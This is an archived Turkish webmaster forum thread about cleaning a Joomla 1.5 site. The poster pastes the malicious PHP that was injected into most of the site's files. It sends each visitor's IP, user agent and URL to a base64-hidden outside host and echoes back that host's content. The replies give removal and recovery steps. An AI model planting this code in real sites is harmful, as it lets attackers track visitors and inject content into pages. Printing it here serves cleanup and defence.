PDA

Orijinalini görmek için tıklayınız : ÇÖZÜLDÜ joomla 1.5 siteye virüs bulaştı



vlk4n
04-02-2012, 22:04
Merhaba arkadaşlar bir joomla sitesine virus bulaştı dosyaları incelediğimizde dosyaların çoğunda alttaki kodlara rastladım bunu kolay yoldan temizlemenin bir yolu varmı. Tüm dosyalara aşağıdaki php kodları entegre edilmiş.


<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBoc A==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

Ümit
04-02-2012, 22:33
Joomla 1.5 hangi sürümü. Bilgisayarınıza bulaşan trojan ftp aracılığı ile buna neden olmuş.

Hacklemek için atılmış. Bunun için kolay yol aramayın, siteniz elden gidebilir. Siteyi yayına kapatın. İlk önce bilgisayarınız temizleyin. Daha sonra kodları temizleyin. FTP, site şifrelerini güncelleyin. Bu konu hakkında sunucu yönetimine de haber verin.

base64 sonucuna göre:
Google Safe Browsing diagnostic page for hotlogupdate.com (http://google.com/safebrowsing/diagnostic?site=hotlogupdate.com/)

vlk4n
04-02-2012, 22:39
teşekkür ederim trojanı çözdüm. Şimdi tüm dosyalardan bunu nasıl ayıklayacağım sorun orada işte ?

Ümit
04-02-2012, 22:58
FTP'den yedeğinizi alın. Kullandığınız Joomla 1.5.x neyse sürümünü tekrardan indirin. Installation dizini ve configuration dosyası hariç FTP'deki eski klasör ve dosyaların üzerine yazdırın. Kullandığınız temalar ve eklentiler ile configuration dosyasını tek tek kontrol edin. (Tema ve eklentiler için en basit yol olarak, Tema ve eklentiler özelleştirilmemişse kaldırın ve yeniden kurun.)

vlk4n
05-02-2012, 10:30
Teşekkürler ilginiz için şu yöntem ile hallettim. Tüm dosyaları bilgisayara indirdim. Notepat++ ile şifreli kodu tüm dosyalarda aradım. Sorunlu dosyaları halledip geri yükleme yaptım cpanel ftp yönetici şifrelerini değiştirdim. Birde güvenlik eklentisi kurdum. Şuan herşey normal teşekkürler